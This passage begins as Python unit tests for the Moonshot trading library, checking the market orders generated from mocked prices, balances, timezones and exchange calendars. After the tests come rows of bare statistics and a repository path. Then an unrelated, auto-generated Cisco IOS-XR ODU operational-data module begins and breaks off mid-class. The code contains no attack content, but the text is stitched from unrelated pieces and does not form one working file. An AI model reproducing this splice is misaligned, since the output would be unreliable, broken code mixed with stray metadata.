rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders_10 = BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-01 10:05:00")
orders_11 = BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-01 11:30:35")
self.assertSetEqual(
set(orders_10.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders_10.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 9.60 = 3125
'TotalQuantity': 3125,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 10.56 = 2841
'TotalQuantity': 2841,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
self.assertListEqual(
orders_11.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 10.45 = 2871
'TotalQuantity': 2871,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 12.01 = 2498
'TotalQuantity': 2498,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_continuous_intraday(self):
"""
Tests that the latest signal date and signal time are used on a
continuous intraday strategy to generate orders.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
now = pd.Timestamp.now(tz="America/New_York").tz_localize(None)
dt_idx = pd.date_range(end=now, periods=2, normalize=True)
fields = ["Close"]
first_time = (now - pd.Timedelta(seconds=120)).strftime("%H:%M:00")
second_time = (now - pd.Timedelta(seconds=60)).strftime("%H:%M:00")
times = [first_time, second_time]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
15.45,
8.67,
],
"FI23456": [
# Close
10.56,
12.01,
9.80,
13.40,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[60000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 8.67 = 3460
'TotalQuantity': 3460,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 13.40 = 2239
'TotalQuantity': 2239,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_signal_date_from_timezone(self):
"""
Tests that the signal date is derived from the TIMEZONE, if set.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
TIMEZONE = "America/Mexico_City"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
0.99,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
def mock_pd_timestamp_now(tz=None):
if tz == "America/Mexico_City":
return pd.Timestamp("2018-05-02 10:40:00", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow1().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-1',
# 1.0 allocation * 1.0 weight * 55K / 0.99
'TotalQuantity': 55556,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_signal_date_from_inferred_timezone(self):
"""
Tests that the signal date is derived from the inferred timezone.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-04-01", "2018-04-02", "2018-04-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
0.9,
11,
10.50
],
"FI23456": [
# Close
0.89,
0.99,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/Mexico_City",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/Mexico_City",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
def mock_pd_timestamp_now(tz=None):
if tz == "America/Mexico_City":
return pd.Timestamp("2018-04-01 10:40:00", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow1().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-1',
# 1.0 allocation * 0.5 weight * 55K / 0.9
'TotalQuantity': 30556,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-1',
# 1.0 allocation * 0.5 weight * 55K / 0.89
'TotalQuantity': 30899,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_complain_if_stale_date_and_suggest_CALENDAR(self):
"""
Tests that the error message suggests setting CALENDAR when the data is stale by a single day.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-04-01", "2018-04-02", "2018-04-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
0.9,
11,
10.50
],
"FI23456": [
# Close
0.89,
0.99,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/Mexico_City",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/Mexico_City",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
def mock_pd_timestamp_now(tz=None):
if tz == "America/Mexico_City":
return pd.Timestamp("2018-04-04 10:40:00", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow1().trade({"U123": 1.0})
self.assertIn((
"expected signal date 2018-04-04 not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-04-03)"
" If your strategy trades before the open and 2018-04-04 data "
"is not expected, try setting CALENDAR = <exchange>").format(
pd.Timestamp.today(tz="America/New_York")), repr(cm.exception))
@patch("moonshot.strategies.base.list_calendar_statuses")
def test_signal_date_from_calendar_timezone_if_open(self, mock_list_calendar_statuses):
"""
Tests that the signal date is derived from the CALENDAR timezone, if
set and the exchange is open.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
CALENDAR = "TSEJ"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
0.99,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
def _mock_list_calendar_statuses():
return {
"TSEJ":{
"timezone": "Japan",
"status": "open",
"since": "2018-05-02T09:00:00",
"until": "2018-05-02T14:00:00"
}
}
mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()
def mock_pd_timestamp_now(tz=None):
if tz == "Japan":
return pd.Timestamp("2018-05-02 10:40:00", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow1().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-1',
# 1.0 allocation * 1.0 weight * 55K / 0.99
'TotalQuantity': 55556,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
@patch("moonshot.strategies.base.list_calendar_statuses")
def test_signal_date_from_calendar_since_if_closed(self, mock_list_calendar_statuses):
"""
Tests that the signal date is derived from the CALENDAR "since"
value, if set and the exchange is closed (i.e. is derived from the
exchange last open date).
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
CALENDAR = "TSEJ"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
0.50
],
"FI23456": [
# Close
9.89,
0.99,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
# First, as a control, pretend the exchange is open; this should
# raise an error
def _mock_list_calendar_statuses():
return {
"TSEJ":{
"timezone": "Japan",
"status": "open",
"since": "2018-05-04T09:00:00",
"until": "2018-05-04T14:00:00"
}
}
mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()
def mock_pd_timestamp_now(tz=None):
if tz == "Japan":
return pd.Timestamp("2018-05-04 08:40:00", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow1().trade({"U123": 1.0})
self.assertIn((
"expected signal date 2018-05-04 not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-05-03"), repr(cm.exception))
# Now pretend it's May 4 but the exchange was last open May 3
def _mock_list_calendar_statuses():
return {
"TSEJ":{
"timezone": "Japan",
"status": "closed",
"since": "2018-05-03T14:00:00",
"until": "2018-05-04T09:00:00"
}
}
mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow1().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-1',
# 1.0 allocation * 1.0 weight * 55K / 0.50
'TotalQuantity': 110000,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
| 37.096212
| 126
| 0.44055
| 5,418
| 61,691
| 4.864157
| 0.068106
| 0.035516
| 0.063709
| 0.074789
| 0.907832
| 0.898915
| 0.884458
| 0.870722
| 0.86374
| 0.854671
| 0
| 0.062275
| 0.456242
| 61,691
| 1,662
| 127
| 37.118532
| 0.723357
| 0.060495
| 0
| 0.800912
| 0
| 0
| 0.161613
| 0.055489
| 0
| 0
| 0
| 0
| 0.023556
| 1
| 0.072188
| false
| 0.006079
| 0.005319
| 0.008359
| 0.132979
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fd6955a789bf0a2d39beb111bf28898708e9707d
| 476,279
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_controller_odu_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR controller\-odu package operational data.
This module contains definitions
for the following management objects\:
odu\: ODU operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class DpProgrammed(Enum):
"""
DpProgrammed (Enum Class)
Dp programmed
.. data:: dp_not_programmed = 0
DP not programmed
.. data:: dp_programmed_success = 1
DP programmed
.. data:: end_pt_first_channel_ized = 2
ENDPT FIRST CHANNELIZED
.. data:: end_pt_se_cond_channel_ized = 3
ENDPT SECOND CHANNELIZED
.. data:: end_pt_first_cross_connected = 4
ENDPT FIRST CROSS CONNECTED
.. data:: end_pt_se_cond_cross_connected = 5
ENDPT SECOND CROSS CONNECTED
.. data:: end_pt_first_open_connected = 6
ENDPT FIRST OPEN CONNECTED
.. data:: end_pt_se_cond_open_connected = 7
ENDPT SECOND OPEN CONNECTED
.. data:: end_pt_first_loop_back_ed = 8
ENDPT FIRST LOOPBACKED
.. data:: end_pt_se_cond_loop_back_ed = 9
ENDPT SECOND LOOPBACKED
.. data:: end_pt_odu_type_mismatch = 10
ENDPT ODU TYPE MISMATCH
.. data:: xc_not_set = 11
XCONNECT NOT SET
"""
dp_not_programmed = Enum.YLeaf(0, "dp-not-programmed")
dp_programmed_success = Enum.YLeaf(1, "dp-programmed-success")
end_pt_first_channel_ized = Enum.YLeaf(2, "end-pt-first-channel-ized")
end_pt_se_cond_channel_ized = Enum.YLeaf(3, "end-pt-se-cond-channel-ized")
end_pt_first_cross_connected = Enum.YLeaf(4, "end-pt-first-cross-connected")
end_pt_se_cond_cross_connected = Enum.YLeaf(5, "end-pt-se-cond-cross-connected")
end_pt_first_open_connected = Enum.YLeaf(6, "end-pt-first-open-connected")
end_pt_se_cond_open_connected = Enum.YLeaf(7, "end-pt-se-cond-open-connected")
end_pt_first_loop_back_ed = Enum.YLeaf(8, "end-pt-first-loop-back-ed")
end_pt_se_cond_loop_back_ed = Enum.YLeaf(9, "end-pt-se-cond-loop-back-ed")
end_pt_odu_type_mismatch = Enum.YLeaf(10, "end-pt-odu-type-mismatch")
xc_not_set = Enum.YLeaf(11, "xc-not-set")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['DpProgrammed']
class GmplsTtiMode(Enum):
"""
GmplsTtiMode (Enum Class)
Gmpls tti mode
.. data:: gmpls_odu_tti_mode_none = 0
Not Set
.. data:: gmpls_odu_tti_mode_sm = 1
Section Monitoring
.. data:: gmpls_odu_tti_mode_pm = 2
Path Monitoring
.. data:: gmpls_odu_tti_mode_tcm = 3
Tandem Connection Monitoring
"""
gmpls_odu_tti_mode_none = Enum.YLeaf(0, "gmpls-odu-tti-mode-none")
gmpls_odu_tti_mode_sm = Enum.YLeaf(1, "gmpls-odu-tti-mode-sm")
gmpls_odu_tti_mode_pm = Enum.YLeaf(2, "gmpls-odu-tti-mode-pm")
gmpls_odu_tti_mode_tcm = Enum.YLeaf(3, "gmpls-odu-tti-mode-tcm")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['GmplsTtiMode']
class OduAinsStateEt(Enum):
"""
OduAinsStateEt (Enum Class)
Odu ains state et
.. data:: none = 0
None
.. data:: active_running = 1
Running
.. data:: active_pending = 2
Pending
"""
none = Enum.YLeaf(0, "none")
active_running = Enum.YLeaf(1, "active-running")
active_pending = Enum.YLeaf(2, "active-pending")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduAinsStateEt']
class OduDerState(Enum):
"""
OduDerState (Enum Class)
Odu der state
.. data:: out_of_service = 0
Out Of Service
.. data:: in_service = 1
In Service
.. data:: maintenance = 2
Maintenance
.. data:: ains = 3
Automatic In Service
"""
out_of_service = Enum.YLeaf(0, "out-of-service")
in_service = Enum.YLeaf(1, "in-service")
maintenance = Enum.YLeaf(2, "maintenance")
ains = Enum.YLeaf(3, "ains")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduDerState']
class OduEtherMapPingEt(Enum):
"""
OduEtherMapPingEt (Enum Class)
Odu ether map ping et
.. data:: none = 0
None
.. data:: gfp = 1
GfpF
.. data:: amp = 2
Amp
.. data:: bmp = 3
Bmp
.. data:: gmp = 4
Gmp
.. data:: wis = 5
Wis
.. data:: gfp_ext = 6
GfpF Ext
"""
none = Enum.YLeaf(0, "none")
gfp = Enum.YLeaf(1, "gfp")
amp = Enum.YLeaf(2, "amp")
bmp = Enum.YLeaf(3, "bmp")
gmp = Enum.YLeaf(4, "gmp")
wis = Enum.YLeaf(5, "wis")
gfp_ext = Enum.YLeaf(6, "gfp-ext")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduEtherMapPingEt']
class OduFlexTypeEt(Enum):
"""
OduFlexTypeEt (Enum Class)
Odu flex type et
.. data:: na = 0
NA
.. data:: cbr = 1
ODU Flex Type CBR
.. data:: gfp_resizable = 2
ODU Flex Type GFP resizable
.. data:: gfp_fix = 3
ODU Flex Type GFP fix
"""
na = Enum.YLeaf(0, "na")
cbr = Enum.YLeaf(1, "cbr")
gfp_resizable = Enum.YLeaf(2, "gfp-resizable")
gfp_fix = Enum.YLeaf(3, "gfp-fix")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduFlexTypeEt']
class OduLoopBackMode(Enum):
"""
OduLoopBackMode (Enum Class)
Odu loop back mode
.. data:: none = 1
None
.. data:: line = 2
Line
.. data:: internal = 4
Internal
"""
none = Enum.YLeaf(1, "none")
line = Enum.YLeaf(2, "line")
internal = Enum.YLeaf(4, "internal")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduLoopBackMode']
class OduPerMon(Enum):
"""
OduPerMon (Enum Class)
Odu per mon
.. data:: disable = 0
Disable
.. data:: enable = 1
Enable
"""
disable = Enum.YLeaf(0, "disable")
enable = Enum.YLeaf(1, "enable")
@staticmethod
def _meta_info():
